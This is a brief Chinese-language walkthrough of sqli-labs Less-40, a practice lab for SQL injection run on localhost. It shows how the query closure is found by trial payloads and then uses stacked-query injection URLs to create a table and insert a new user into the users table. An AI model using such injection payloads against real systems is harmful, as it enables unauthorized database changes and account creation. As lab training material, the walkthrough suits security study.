sqli-labs (less-40)
进入40关,输入id=1
http://127.0.0.1/sql1/Less-40/?id=1' #无错误回显
因为没有错误回显,所以我们一个一个去猜闭合的方式
http://127.0.0.1/sql1/Less-40/?id=1'--+ #回显错误
http://127.0.0.1/sql1/Less-40/?id=1')--+ #回显正常
这里我们不使用union注入,我们使用堆叠注入攻击
创建一张表
http://127.0.0.1/sql1/Less-40/?id=1');create table test like users;--+
创建成功
创建一个新用户
http://127.0.0.1/sql1/Less-40/?id=1');insert into users values(18,'icepeak','icepeak');--+
创建成功